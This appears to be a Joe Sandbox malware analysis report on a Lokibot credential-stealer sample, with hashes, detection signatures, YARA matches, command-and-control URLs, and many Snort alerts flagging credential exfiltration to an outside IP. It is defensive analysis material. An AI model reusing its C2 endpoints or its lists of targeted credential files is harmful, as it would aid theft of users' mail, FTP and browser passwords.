Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kVijllv0Yl

Overview

General Information

Sample Name:kVijllv0Yl (renamed file extension from none to exe)
Analysis ID:562515
MD5:6997de404fb7e798aecc2c8a14fd2f12
SHA1:121a437542ba544f975847429dda439719800bb9
SHA256:f36a543cfcddf76b99df925bf70b22d560792d1059387e00bfe782bffd6e8a2b
Tags:32exeLokitrojan
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • kVijllv0Yl.exe (PID: 2312 cmdline: "C:\Users\user\Desktop\kVijllv0Yl.exe" MD5: 6997DE404FB7E798AECC2C8A14FD2F12)
    • kVijllv0Yl.exe (PID: 1292 cmdline: "C:\Users\user\Desktop\kVijllv0Yl.exe" MD5: 6997DE404FB7E798AECC2C8A14FD2F12)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
        • 0x17936:$f1: FileZilla\recentservers.xml
        • 0x17976:$f2: FileZilla\sitemanager.xml
        • 0x15be6:$b2: Mozilla\Firefox\Profiles
        • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x15afa:$s4: logins.json
        • 0x169a4:$s6: wand.dat
        • 0x15424:$a1: username_value
        • 0x15414:$a2: password_value
        • 0x15a5f:$a3: encryptedUsername
        • 0x15acc:$a3: encryptedUsername
        • 0x15a72:$a4: encryptedPassword
        • 0x15ae0:$a4: encryptedPassword
        00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        Click to see the 37 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.kVijllv0Yl.exe.1ade0000.3.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13278:$s1: http://
        • 0x16233:$s1: http://
        • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13280:$s2: https://
        • 0x13278:$f1: http://
        • 0x16233:$f1: http://
        • 0x13280:$f2: https://
        0.2.kVijllv0Yl.exe.1ade0000.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0.2.kVijllv0Yl.exe.1ade0000.3.unpackLoki_1Loki Payloadkevoreilly
          • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x133fc:$a2: last_compatible_version
          0.2.kVijllv0Yl.exe.1ade0000.3.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x123ff:$des3: 68 03 66 00 00
          • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          1.0.kVijllv0Yl.exe.400000.9.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          Click to see the 84 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
          Multi AV Scanner detection for submitted file
          Source: kVijllv0Yl.exeVirustotal: Detection: 40%Perma Link
          Source: kVijllv0Yl.exeReversingLabs: Detection: 47%
          Antivirus detection for URL or domain
          Source: http://secure01-redirect.net/gc15/fre.phpAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: secure01-redirect.netVirustotal: Detection: 21%Perma Link
          Source: http://secure01-redirect.net/gc15/fre.phpVirustotal: Detection: 19%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dllVirustotal: Detection: 27%Perma Link
          Machine Learning detection for sample
          Source: kVijllv0Yl.exeJoe Sandbox ML: detected
          Source: 1.0.kVijllv0Yl.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.kVijllv0Yl.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.kVijllv0Yl.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.kVijllv0Yl.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: kVijllv0Yl.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

          Networking

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49769 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49769 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49770 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49770 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49771
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49773 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49773 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49773 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49773 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49773
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49774 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49774 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49774 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49774 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49774
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49775 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49775 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49775 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49775 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49775
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49776 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49776 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49776 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49776 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49776
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49779 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49779 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49779 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49779 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49779
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49780 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49780 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49780 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49780 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49780
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49782 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49782 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49782 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49782 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49782
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49783 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49783 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49783 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49783 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49783
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49784 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49784 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49784 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49784 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49784
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49787
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49793
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49795
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49797 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49797 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49797 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49797 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49797
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49802
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49818 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49818 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49818 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49818 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49818
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49830 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49830 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49830 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49830 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49830
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49840 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49840 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49840 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49840 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49840
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49841 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49841 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49841 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49841 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49841
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49842 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49842 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49842 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49842 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49842
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49845 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49845 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49845 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49845 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49845
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49850 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49850 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49850 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49850 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49850
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49851 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49851 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49851 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49851 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49851
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49852 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49852 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49852 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49852 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49852
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49854 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49854 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49854 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49854 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49854
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49855 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49855 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49855 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49855 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49855
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49862 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49862 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49862 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49862 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49862
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49870 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49870 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49870 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49870 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49870
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49881 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49881 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49881 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49881 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49881
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49882 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49882 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49882 -> 185.185.69.76:80
